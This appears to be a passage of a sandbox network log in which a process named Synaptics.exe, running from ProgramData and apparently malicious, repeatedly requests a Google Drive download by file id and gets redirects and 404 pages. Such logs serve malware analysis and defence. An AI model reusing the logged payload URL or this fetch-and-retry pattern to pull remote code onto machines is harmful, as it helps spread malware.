                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:35 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-gd228yi31VpFEIgXp70NoA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
106 | 192.168.2.5 | 49975 | 142.250.186.33 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:35 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
2024-12-30 10:23:36 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC4kgWIAoXPJEafRG-rBzAmLgMy_lUI4GLoGRNz-3itIi6_xEVeSd6WfscHCY21D7MClQcT4HOY
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:36 GMT
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-BflQQ2cwIyt5scdNY40m-w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
2024-12-30 10:23:36 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:23:36 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="q1dOIWeYI7qNDzAQY_nK7w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:23:36 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
107 | 192.168.2.5 | 49983 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:36 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
2024-12-30 10:23:36 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:36 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-_coe0zkg7CNq1uQoaG_6Uw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      108 | 192.168.2.5 | 49984 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-12-30 10:23:36 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      109 | 192.168.2.5 | 49985 | 142.250.186.33 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-12-30 10:23:36 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      110 | 192.168.2.5 | 49986 | 142.250.186.33 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-12-30 10:23:36 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:37 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC4fNsXOw2LOxqHCNCOgyYfGaUahACuTzxpUCpRf2e94KO4Z3AyfJ-uwZ7_ao_MEKJ95
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:37 GMT
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-y5SqVzsoxvKSwlq2B5I9vg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:37 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                      2024-12-30 10:23:37 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="gOSVLX9eBTdYnF9tS92RCw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                      2024-12-30 10:23:37 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      111 | 192.168.2.5 | 49994 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-12-30 10:23:37 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:37 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:37 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-YMj67WYuegblscM310SzSA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      112 | 192.168.2.5 | 49995 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-12-30 10:23:37 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:37 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:37 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-zgOW3__aPJUznFxe1nsPhg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      113 | 192.168.2.5 | 49996 | 142.250.186.33 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-12-30 10:23:37 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:38 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC6qIAKt0tAYw7GvBkbLPvtjEtuMy-DUbUU4RjFzBqdWjoDcyLViv0R1Nv1fz-H8lgHdh7ilCMc
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:37 GMT
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-ZOAkT6HPPce_1-6RJ2easQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:38 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                      2024-12-30 10:23:38 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="yVSE9EYMdAQc4co601ewag">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                      2024-12-30 10:23:38 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
114 | 192.168.2.5 | 50002 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:38 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
2024-12-30 10:23:39 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:38 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-lALdiWS9zp6lRLrQVME-bA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
115 | 192.168.2.5 | 50003 | 142.250.186.33 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:38 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
2024-12-30 10:23:39 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC6w5uigjrW9kriK7rVMEBmuSa14F-uwo4v1Xn595ZO1RBk11YxamTMsKwnJQEnmyiIe
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:39 GMT
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-Lm5OuHaBb70nD6jFd5DyQA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
2024-12-30 10:23:39 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:23:39 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="02Y0NfBYWJDxsi3Zb2eMlA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:23:39 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
116 | 192.168.2.5 | 50004 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:38 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
2024-12-30 10:23:39 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
